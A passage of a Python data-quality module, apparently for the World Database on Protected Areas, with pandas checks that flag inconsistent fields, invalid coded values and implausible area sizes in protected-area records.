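\n# --- Design note (sketch; the suite itself keeps the explicit wrappers) ---\n# Every wrapper in this section only pins check_field, so the family could\n# also be generated mechanically with functools.partial. The names\n# _EXAMPLE_FIELDS and _example_generated_checks are hypothetical and exist\n# only for this illustration.\nfrom functools import partial\n\n_EXAMPLE_FIELDS = ['NAME', 'ORIG_NAME', 'DESIG', 'DESIG_ENG']\n_example_generated_checks = {\n    f: partial(inconsistent_fields_same_wdpaid, check_field=f)\n    for f in _EXAMPLE_FIELDS\n}\n# e.g. _example_generated_checks['NAME'](wdpa_df, return_pid=True) behaves\n# like inconsistent_name_same_wdpaid(wdpa_df, return_pid=True) below.\n\n#####################################\n#### 3.2.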
Inconsistent ORIG_NAME ####\n#####################################\n\ndef inconsistent_orig_name_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'ORIG_NAME'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n\n check_field = 'ORIG_NAME'\n \n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n#################################\t\n#### 3.3. Inconsistent DESIG ####\n#################################\n\ndef inconsistent_desig_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'DESIG'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n \n check_field = 'DESIG'\n \n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\t\n#####################################\n#### 3.4. Inconsistent DESIG_ENG ####\n#####################################\n\ndef inconsistent_desig_eng_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'DESIG_ENG'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n \n check_field = 'DESIG_ENG'\n \n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n######################################\n#### 3.5. Inconsistent DESIG_TYPE ####\n######################################\n\ndef inconsistent_desig_type_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'DESIG_TYPE'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n \n check_field = 'DESIG_TYPE'\n \n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n\n####################################\n#### 3.6. Inconsistent INT_CRIT ####\n####################################\n\ndef inconsistent_int_crit_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'INT_CRIT'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n\n check_field = 'INT_CRIT'\n \n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n###################################\n#### 3.7. Inconsistent NO_TAKE ####\n###################################\n\ndef inconsistent_no_take_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'NO_TAKE'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'NO_TAKE'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n##################################\n#### 3.8. 
Inconsistent STATUS ####\n##################################\n\ndef inconsistent_status_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'STATUS'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'STATUS'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n#####################################\n#### 3.9. Inconsistent STATUS_YR ####\n#####################################\n\ndef inconsistent_status_yr_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'STATUS_YR'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'STATUS_YR'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n#####################################\n#### 3.10. Inconsistent GOV_TYPE ####\n#####################################\n\ndef inconsistent_gov_type_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'GOV_TYPE'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'GOV_TYPE'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n#####################################\n#### 3.11. Inconsistent OWN_TYPE ####\n#####################################\n\ndef inconsistent_own_type_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'OWN_TYPE'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'OWN_TYPE'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n######################################\n#### 3.12. Inconsistent MANG_AUTH ####\n######################################\n\ndef inconsistent_mang_auth_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'MANG_AUTH'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n \n check_field = 'MANG_AUTH'\n \n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n######################################\n#### 3.13. Inconsistent MANG_PLAN ####\n######################################\n\ndef inconsistent_mang_plan_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'MANG_PLAN'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'MANG_PLAN'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n##################################\n#### 3.14. 
Inconsistent VERIF ####\n##################################\n\ndef inconsistent_verif_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'VERIF'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'VERIF'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n#######################################\n#### 3.15. Inconsistent METADATAID ####\n#######################################\n\ndef inconsistent_metadataid_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'METADATAID'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'METADATAID'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n####################################\n#### 3.16. Inconsistent SUB_LOC ####\n####################################\n\ndef inconsistent_sub_loc_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'SUB_LOC'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'SUB_LOC'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n#######################################\n### 3.17. Inconsistent PARENT_ISO3 ####\n#######################################\n\ndef inconsistent_parent_iso3_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'PARENT_ISO3'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'PARENT_ISO3'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n#################################\n#### 3.18. Inconsistent ISO3 ####\n#################################\n\n\ndef inconsistent_iso3_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'ISO3'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'ISO3'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\t\n##########################################\n#### 4. Find invalid values in fields ####\n##########################################\n\n#### Factory Function ####\n\ndef invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid=False):\n '''\n Factory Function: this generic function is to be linked to\n the family of 'invalid' input functions stated below. These latter \n functions are to give information on which fields to check and pull \n from the DataFrame. 
This function is the foundation of the others.\n \n This function checks the WDPA for invalid values and returns a list of WDPA_PIDs \n that have invalid values for the specified field(s).\n \n Return True if invalid values are found in specified fields.\n \n Return list of WDPA_PIDs with invalid fields, if return_pid is set True.\n\n ## Arguments ##\n \n field -- a string specifying the field to be checked\n field_allowed_values -- a list of expected values in each field\n condition_field -- a list with another field on which the evaluation of \n invalid values depends; leave \"\" if no condition specified\n condition_crit -- a list of values for which the condition_field \n needs to be evaluated; leave [] if no condition specified\n\n ## Example ##\n invalid_value_in_field(\n wdpa_df,\n field=\"DESIG_ENG\",\n field_allowed_values=[\"Ramsar Site, Wetland of International Importance\", \n \"UNESCO-MAB Biosphere Reserve\", \n \"World Heritage Site (natural or mixed)\"],\n condition_field=\"DESIG_TYPE\",\n condition_crit=[\"International\"],\n return_pid=True):\n '''\n\n # if condition_field and condition_crit are specified\n if condition_field != '' and condition_crit != []:\n invalid_wdpa_pid = wdpa_df[(~wdpa_df[field].isin(field_allowed_values)) & (wdpa_df[condition_field].isin(condition_crit))]['WDPA_PID'].values\n\n # If condition_field and condition_crit are not specified\n else:\n invalid_wdpa_pid = wdpa_df[~wdpa_df[field].isin(field_allowed_values)]['WDPA_PID'].values\n \n if return_pid:\n # return list with invalid WDPA_PIDs\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n#### Input functions ####\n\n#############################\n#### 4.1. Invalid PA_DEF ####\n#############################\n\ndef invalid_pa_def(wdpa_df, return_pid=False):\n '''\n Return True if PA_DEF not 1\n Return list of WDPA_PIDs where PA_DEF is not 1, if return_pid is set True\n '''\n\n field = 'PA_DEF'\n field_allowed_values = ['1'] # WDPA datatype is string\n condition_field = ''\n condition_crit = []\n\n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n################################################\n#### 4.2. Invalid DESIG_ENG - international ####\n################################################\n\ndef invalid_desig_eng_international(wdpa_df, return_pid=False):\n '''\n Return True if DESIG_ENG is invalid while DESIG_TYPE is 'International'\n Return list of WDPA_PIDs where DESIG_ENG is invalid, if return_pid is set True\n '''\n \n field = 'DESIG_ENG'\n field_allowed_values = ['Ramsar Site, Wetland of International Importance', \n 'UNESCO-MAB Biosphere Reserve', \n 'World Heritage Site (natural or mixed)']\n condition_field = 'DESIG_TYPE'\n condition_crit = ['International']\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n#################################################\n#### 4.3. 
Invalid DESIG_TYPE - international ####\n#################################################\n\ndef invalid_desig_type_international(wdpa_df, return_pid=False):\n '''\n Return True if DESIG_TYPE is unequal to 'International', while DESIG_ENG is an allowed 'International' value\n Return list of WDPA_PIDs where DESIG_TYPE is invalid, if return_pid is set True\n '''\n \n field = 'DESIG_TYPE'\n field_allowed_values = ['International']\n condition_field = 'DESIG_ENG'\n condition_crit = ['Ramsar Site, Wetland of International Importance', \n 'UNESCO-MAB Biosphere Reserve', \n 'World Heritage Site (natural or mixed)']\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n\n###########################################\n#### 4.4. Invalid DESIG_ENG - regional ####\n###########################################\n\ndef invalid_desig_eng_regional(wdpa_df, return_pid=False):\n '''\n Return True if DESIG_ENG is invalid while DESIG_TYPE is 'Regional'\n Return list of WDPA_PIDs where DESIG_ENG is invalid, if return_pid is set True\n '''\n \n field = 'DESIG_ENG'\n field_allowed_values = ['Baltic Sea Protected Area (HELCOM)', \n 'Specially Protected Area (Cartagena Convention)', \n 'Marine Protected Area (CCAMLR)', \n 'Marine Protected Area (OSPAR)', \n 'Site of Community Importance (Habitats Directive)', \n 'Special Protection Area (Birds Directive)', \n 'Specially Protected Areas of Mediterranean Importance (Barcelona Convention)']\n condition_field = 'DESIG_TYPE'\n condition_crit = ['Regional']\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n###########################################\n#### 4.5. Invalid DESIG_TYPE - regional ###\n###########################################\n\ndef invalid_desig_type_regional(wdpa_df, return_pid=False):\n '''\n Return True if DESIG_TYPE is unequal to 'Regional' while DESIG_ENG is an allowed 'Regional' value\n Return list of WDPA_PIDs where DESIG_TYPE is invalid, if return_pid is set True\n '''\n \n field = 'DESIG_TYPE'\n field_allowed_values = ['Regional']\n condition_field = 'DESIG_ENG'\n condition_crit = ['Baltic Sea Protected Area (HELCOM)', \n 'Specially Protected Area (Cartagena Convention)', \n 'Marine Protected Area (CCAMLR)', \n 'Marine Protected Area (OSPAR)', \n 'Site of Community Importance (Habitats Directive)', \n 'Special Protection Area (Birds Directive)', \n 'Specially Protected Areas of Mediterranean Importance (Barcelona Convention)']\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n\n#################################################################################\n#### 4.6. 
Invalid INT_CRIT & DESIG_ENG - Ramsar Site & World Heritage Sites ####\n#################################################################################\n\ndef invalid_int_crit_desig_eng_ramsar_whs(wdpa_df, return_pid=False):\n    '''\n    Return True if INT_CRIT is unequal to the allowed values (1023 criterion \n    combinations plus 'Not Reported') and DESIG_ENG equals 'Ramsar Site (...)' or 'World Heritage Site (...)'\n    Return list of WDPA_PIDs where INT_CRIT is invalid, if return_pid is set True\n    '''\n    \n    # Function to create the possible INT_CRIT combinations\n    def generate_combinations():\n        import itertools\n        collection = []\n        INT_CRIT_ELEMENTS = ['(i)','(ii)','(iii)','(iv)',\n                             '(v)','(vi)','(vii)','(viii)',\n                             '(ix)','(x)']\n        for length_combi in range(1, len(INT_CRIT_ELEMENTS)+1): # for 1 - 10 elements\n            for combi in itertools.combinations(INT_CRIT_ELEMENTS, length_combi): # generate combinations\n                collection.append(''.join(combi)) # join each tuple into one string, e.g. ('(i)', '(ii)') -> '(i)(ii)', and append it\n        return collection\n    \n    # Arguments\n    field = 'INT_CRIT'\n    field_allowed_values_extra = ['Not Reported']\n    field_allowed_values = generate_combinations() + field_allowed_values_extra\n    condition_field = 'DESIG_ENG'\n    condition_crit = ['Ramsar Site, Wetland of International Importance', \n                      'World Heritage Site (natural or mixed)']\n    \n    return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n#################################\n#### 4.7. Invalid DESIG_TYPE ####\n#################################\n\ndef invalid_desig_type(wdpa_df, return_pid=False):\n    '''\n    Return True if DESIG_TYPE is not \"National\", \"Regional\", \"International\" or \"Not Applicable\"\n    Return list of WDPA_PIDs where DESIG_TYPE is invalid, if return_pid is set True\n    '''\n\n    field = 'DESIG_TYPE'\n    field_allowed_values = ['National', \n                            'Regional', \n                            'International', \n                            'Not Applicable']\n    condition_field = ''\n    condition_crit = []\n\n    return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n###############################\n#### 4.8. Invalid IUCN_CAT ####\n###############################\n\ndef invalid_iucn_cat(wdpa_df, return_pid=False):\n    '''\n    Return True if IUCN_CAT is not equal to allowed values\n    Return list of WDPA_PIDs where IUCN_CAT is invalid, if return_pid is set True\n    '''\n    \n    field = 'IUCN_CAT'\n    field_allowed_values = ['Ia', 'Ib', 'II', 'III', \n                            'IV', 'V', 'VI', \n                            'Not Reported', \n                            'Not Applicable', \n                            'Not Assigned']\n    condition_field = ''\n    condition_crit = []\n    \n    return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n#####################################################################\n#### 4.9. Invalid IUCN_CAT - UNESCO-MAB and World Heritage Sites ####\n#####################################################################\n\ndef invalid_iucn_cat_unesco_whs(wdpa_df, return_pid=False):\n    '''\n    Return True if IUCN_CAT is unequal to 'Not Applicable' \n    and DESIG_ENG is 'UNESCO-MAB (...)' or 'World Heritage Site (...)'\n    Return list of WDPA_PIDs where IUCN_CAT is invalid, if return_pid is set True\n    '''\n    \n    field = 'IUCN_CAT'\n    field_allowed_values = ['Not Applicable']\n    condition_field = 'DESIG_ENG'\n    condition_crit = ['UNESCO-MAB Biosphere Reserve', \n                      'World Heritage Site (natural or mixed)']\n    \n    return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n
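\n# --- Worked example (illustrative; not part of the original QA suite) ---\n# generate_combinations() in 4.6 yields every non-empty ordered subset of the\n# ten criteria joined into one string - '(i)', '(i)(iii)', '(ii)(ix)(x)', ... -\n# i.e. 2**10 - 1 = 1023 values; 'Not Reported' is then the 1024th allowed\n# value. The helper below is hypothetical and merely restates that count.\ndef _example_int_crit_value_count():\n    '''Hypothetical helper: number of allowed INT_CRIT values for Ramsar/WHS rows.'''\n    import itertools\n    elements = ['(i)','(ii)','(iii)','(iv)','(v)','(vi)','(vii)','(viii)','(ix)','(x)']\n    combinations = sum(1 for k in range(1, len(elements) + 1)\n                       for _ in itertools.combinations(elements, k))\n    return combinations + 1  # 1023 combinations + 'Not Reported' = 1024\n\n##############################\n#### 4.10.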
Invalid MARINE ####\n##############################\n\ndef invalid_marine(wdpa_df, return_pid=False):\n    '''\n    Return True if MARINE is not in [0,1,2]\n    Return list of WDPA_PIDs where MARINE is invalid, if return_pid is set True\n    '''\n\n    field = 'MARINE'\n    field_allowed_values = ['0','1','2']\n    condition_field = ''\n    condition_crit = []\n\n    return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n############################################\n#### 4.11. Invalid NO_TAKE & MARINE = 0 ####\n############################################\n\ndef invalid_no_take_marine0(wdpa_df, return_pid=False):\n    '''\n    Return True if NO_TAKE is not equal to 'Not Applicable' and MARINE = 0\n    Return list of WDPA_PIDs where NO_TAKE is invalid, if return_pid is set True\n    '''\n\n    field = 'NO_TAKE'\n    field_allowed_values = ['Not Applicable']\n    condition_field = 'MARINE'\n    condition_crit = ['0']\n\n    return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n################################################\n#### 4.12. Invalid NO_TAKE & MARINE = [1,2] ####\n################################################\n\ndef invalid_no_take_marine12(wdpa_df, return_pid=False):\n    '''\n    Return True if NO_TAKE is not in ['All', 'Part', 'None', 'Not Reported'] while MARINE = [1, 2]\n    I.e. check whether coastal and marine sites (MARINE = [1, 2]) have an invalid NO_TAKE value.\n    Return list of WDPA_PIDs where NO_TAKE is invalid, if return_pid is set True\n    '''\n\n    field = 'NO_TAKE'\n    field_allowed_values = ['All', 'Part', 'None', 'Not Reported']\n    condition_field = 'MARINE'\n    condition_crit = ['1', '2']\n\n    return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n###########################################\n#### 4.13. Invalid NO_TK_AREA & MARINE ####\n###########################################\n\ndef invalid_no_tk_area_marine0(wdpa_df, return_pid=False):\n    '''\n    Return True if NO_TK_AREA is unequal to 0 while MARINE = 0\n    Return list of WDPA_PIDs where NO_TK_AREA is invalid, if return_pid is set True\n    '''\n\n    field = 'NO_TK_AREA'\n    field_allowed_values = [0]\n    condition_field = 'MARINE'\n    condition_crit = ['0']\n\n    return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n############################################\n#### 4.14. Invalid NO_TK_AREA & NO_TAKE ####\n############################################\n\ndef invalid_no_tk_area_no_take(wdpa_df, return_pid=False):\n    '''\n    Return True if NO_TK_AREA is unequal to 0 while NO_TAKE = 'Not Applicable'\n    Return list of WDPA_PIDs where NO_TK_AREA is invalid, if return_pid is set True\n    '''\n\n    field = 'NO_TK_AREA'\n    field_allowed_values = [0]\n    condition_field = 'NO_TAKE'\n    condition_crit = ['Not Applicable']\n\n    return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n
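\n# --- Note on dtypes (sketch, inferred from the string criteria used above) ---\n# The MARINE conditions in 4.10-4.13 compare against the strings '0', '1'\n# and '2', mirroring the text type of the WDPA attribute table. If a caller\n# loads the table with numeric dtypes, .isin(['0']) silently matches nothing.\n# A hypothetical guard, assuming a pandas DataFrame:\ndef _example_coerce_marine_dtype(wdpa_df):\n    '''Hypothetical helper: cast MARINE to string so the checks above apply.'''\n    wdpa_df = wdpa_df.copy()\n    wdpa_df['MARINE'] = wdpa_df['MARINE'].astype(str)\n    return wdpa_df\n\n##############################\n#### 4.15.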
Invalid STATUS ####\n##############################\n\ndef invalid_status(wdpa_df, return_pid=False):\n '''\n Return True if STATUS is unequal to any of the following allowed values:\n [\"Proposed\", \"Inscribed\", \"Adopted\", \"Designated\", \"Established\"]\n Return list of WDPA_PIDs where STATUS is invalid, if return_pid is set True\n '''\n\n field = 'STATUS'\n field_allowed_values = ['Proposed', 'Inscribed', 'Adopted', 'Designated', 'Established']\n condition_field = ''\n condition_crit = []\n\n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n#################################\n#### 4.16. Invalid STATUS_YR ####\n#################################\n\ndef invalid_status_yr(wdpa_df, return_pid=False):\n '''\n Return True if STATUS_YR is unequal to 0 or any year between 1750 and the current year\n Return list of WDPA_PIDs where STATUS_YR is invalid, if return_pid is set True\n '''\n \n field = 'STATUS_YR'\n year = datetime.date.today().year # obtain current year\n yearArray = [0] + np.arange(1750, year + 1, 1).tolist() # make a list of all years, from 0 to current year\n field_allowed_values = [str(x) for x in yearArray] # change all integers to strings\n condition_field = ''\n condition_crit = []\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n################################\n#### 4.17. Invalid GOV_TYPE ####\n################################\n\ndef invalid_gov_type(wdpa_df, return_pid=False):\n '''\n Return True if GOV_TYPE is invalid\n Return list of WDPA_PIDs where GOV_TYPE is invalid, if return_pid is set True\n '''\n \n field = 'GOV_TYPE'\n field_allowed_values = ['Federal or national ministry or agency', \n 'Sub-national ministry or agency', \n 'Government-delegated management', \n 'Transboundary governance', \n 'Collaborative governance', \n 'Joint governance', \n 'Individual landowners', \n 'Non-profit organisations', \n 'For-profit organisations', \n 'Indigenous peoples', \n 'Local communities', \n 'Not Reported']\n \n condition_field = ''\n condition_crit = []\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n################################\n#### 4.18. Invalid OWN_TYPE ####\n################################\n\ndef invalid_own_type(wdpa_df, return_pid=False):\n '''\n Return True if OWN_TYPE is invalid\n Return list of WDPA_PIDs where OWN_TYPE is invalid, if return_pid is set True\n '''\n \n field = 'OWN_TYPE'\n field_allowed_values = ['State', \n 'Communal', \n 'Individual landowners', \n 'For-profit organisations', \n 'Non-profit organisations', \n 'Joint ownership', \n 'Multiple ownership', \n 'Contested', \n 'Not Reported']\n condition_field = ''\n condition_crit = []\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n#############################\n#### 4.19. Invalid VERIF ####\n#############################\n\ndef invalid_verif(wdpa_df, return_pid=False):\n '''\n Return True if VERIF is invalid\n Return list of WDPA_PIDs where VERIF is invalid, if return_pid is set True\n '''\n \n field = 'VERIF'\n field_allowed_values = ['State Verified', \n 'Expert Verified', \n 'Not Reported']\n condition_field = ''\n condition_crit = []\n \n return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\t\n###################################\n#### 4.20. 
Invalid PARENT_ISO3 ####\n###################################\ndef invalid_country_codes(wdpa_df, field, return_pid=False):\n    '''\n    Return True if the specified field contains a country code that is not a valid ISO3 code\n    Return list of WDPA_PIDs with invalid country codes, if return_pid is set True\n    Note: relies on the module-level list `iso3` of valid ISO3 codes\n    '''\n\n    def _correct_iso3(value):\n        # Multi-country records separate their ISO3 codes with ';'\n        return all(code in iso3 for code in value.split(';'))\n\n    invalid_wdpa_pid = wdpa_df[~wdpa_df[field].apply(_correct_iso3)]['WDPA_PID'].values\n\n    if return_pid:\n        return invalid_wdpa_pid\n\n    return len(invalid_wdpa_pid) > 0\n\ndef invalid_parent_iso3(wdpa_df, return_pid=False):\n    '''\n    Return True if PARENT_ISO3 contains an invalid country code; see invalid_country_codes\n    '''\n\n    return invalid_country_codes(wdpa_df, 'PARENT_ISO3', return_pid)\n\n############################\n#### 4.21. Invalid ISO3 ####\n############################\n\ndef invalid_iso3(wdpa_df, return_pid=False):\n    '''\n    Return True if ISO3 contains an invalid country code; see invalid_country_codes\n    '''\n\n    return invalid_country_codes(wdpa_df, 'ISO3', return_pid)\n\n###########################################\n#### 4.22. Invalid STATUS & DESIG_TYPE ####\n###########################################\n\ndef invalid_status_desig_type(wdpa_df, return_pid=False):\n    '''\n    Return True if STATUS is unequal to 'Established', while DESIG_TYPE = 'Not Applicable'\n    Return list of WDPA_PIDs for which the STATUS is invalid\n    '''\n\n    field = 'STATUS'\n    field_allowed_values = ['Established']\n    condition_field = 'DESIG_TYPE'\n    condition_crit = ['Not Applicable']\n    \n    return invalid_value_in_field(wdpa_df, field, field_allowed_values, condition_field, condition_crit, return_pid)\n\n###############################################################\n#### 5. Area invalid size: GIS or Reported area is invalid ####\n###############################################################\n\n#### Factory Function ####\n\ndef area_invalid_size(wdpa_df, field_small_area, field_large_area, return_pid=False):\n    '''\n    Factory Function: this generic function is to be linked to\n    the family of 'area' input functions stated below. These latter \n    functions are to give information on which fields to check and pull \n    from the DataFrame. This function is the foundation of the others.\n    \n    This function checks the WDPA for invalid areas and returns a list of WDPA_PIDs \n    that have invalid values for the specified field(s).\n\n    Return True if the size of the small_area is invalid compared to large_area\n\n    Return list of WDPA_PIDs where small_area is invalid compared to large_area,\n    if return_pid is set True\n\n    ## Arguments ##\n    field_small_area -- string of the field to check for size - supposedly smaller\n    field_large_area -- string of the field to check for size - supposedly larger\n    \n    ## Example ##\n    area_invalid_size(\n        wdpa_df,\n        field_small_area=\"GIS_M_AREA\",\n        field_large_area=\"GIS_AREA\",\n        return_pid=True)\n    '''\n    \n    size_threshold = 1.0001 # due to the rounding of numbers, there are many false positives without a threshold.\n\n    if field_small_area and field_large_area:\n        invalid_wdpa_pid = wdpa_df[wdpa_df[field_small_area] > \n                                   (size_threshold*wdpa_df[field_large_area])]['WDPA_PID'].values\n\n    else:\n        raise Exception('ERROR: field(s) to test are not specified')\n    \n    if return_pid:\n        return invalid_wdpa_pid\n    \n    return len(invalid_wdpa_pid) > 0\n
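\n# --- Worked example (illustrative; not part of the original QA suite) ---\n# The 1.0001 factor above tolerates rounding noise: with a GIS_AREA of\n# 100 km², a GIS_M_AREA of 100.02 km² is flagged (100.02 > 100.01), while\n# 100.005 km² is within tolerance. The helper below is hypothetical and only\n# restates the comparison used by area_invalid_size.\ndef _example_area_pair_is_invalid(small_area, large_area, threshold=1.0001):\n    '''Hypothetical helper: True if small_area exceeds large_area beyond rounding tolerance.'''\n    return small_area > threshold * large_area\n\n#### Input functions ####\n\n######################################################\n#### 5.1.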
Area invalid: NO_TK_AREA and REP_M_AREA ####\n######################################################\n\ndef area_invalid_no_tk_area_rep_m_area(wdpa_df, return_pid=False):\n '''\n Return True if NO_TK_AREA is larger than REP_M_AREA\n Return list of WDPA_PIDs where NO_TK_AREA is larger than REP_M_AREA if return_pid=True\n '''\n \n field_small_area = 'NO_TK_AREA'\n field_large_area = 'REP_M_AREA'\n \n return area_invalid_size(wdpa_df, field_small_area, field_large_area, return_pid)\n\n######################################################\n#### 5.2. Area invalid: NO_TK_AREA and GIS_M_AREA ####\n######################################################\n\ndef area_invalid_no_tk_area_gis_m_area(wdpa_df, return_pid=False):\n '''\n Return True if NO_TK_AREA is larger than GIS_M_AREA\n Return list of WDPA_PIDs where NO_TK_AREA is larger than GIS_M_AREA if return_pid=True\n '''\n \n field_small_area = 'NO_TK_AREA'\n field_large_area = 'GIS_M_AREA'\n \n return area_invalid_size(wdpa_df, field_small_area, field_large_area, return_pid)\n\n####################################################\n#### 5.3. Area invalid: GIS_M_AREA and GIS_AREA ####\n####################################################\n\ndef area_invalid_gis_m_area_gis_area(wdpa_df, return_pid=False):\n '''\n Return True if GIS_M_AREA is larger than GIS_AREA\n Return list of WDPA_PIDs where GIS_M_AREA is larger than GIS_AREA, if return_pid=True\n '''\n \n field_small_area = 'GIS_M_AREA'\n field_large_area = 'GIS_AREA'\n\n return area_invalid_size(wdpa_df, field_small_area, field_large_area, return_pid)\n\n####################################################\n#### 5.4. Area invalid: REP_M_AREA and REP_AREA ####\n####################################################\n\ndef area_invalid_rep_m_area_rep_area(wdpa_df, return_pid=False):\n '''\n Return True if REP_M_AREA is larger than REP_AREA\n Return list of WDPA_PIDs where REP_M_AREA is larger than REP_AREA, if return_pid=True\n '''\n \n field_small_area = 'REP_M_AREA'\n field_large_area = 'REP_AREA'\n \n return area_invalid_size(wdpa_df, field_small_area, field_large_area, return_pid)\n\t\n#################################\n#### 6. Forbidden characters ####\n#################################\n\n#### Factory Function ####\n\ndef forbidden_character(wdpa_df, check_field, return_pid=False):\n '''\n Factory Function: this generic function is to be linked to\n the family of 'forbidden character' input functions stated below. These latter \n functions are to give information on which fields to check and pull \n from the DataFrame. 
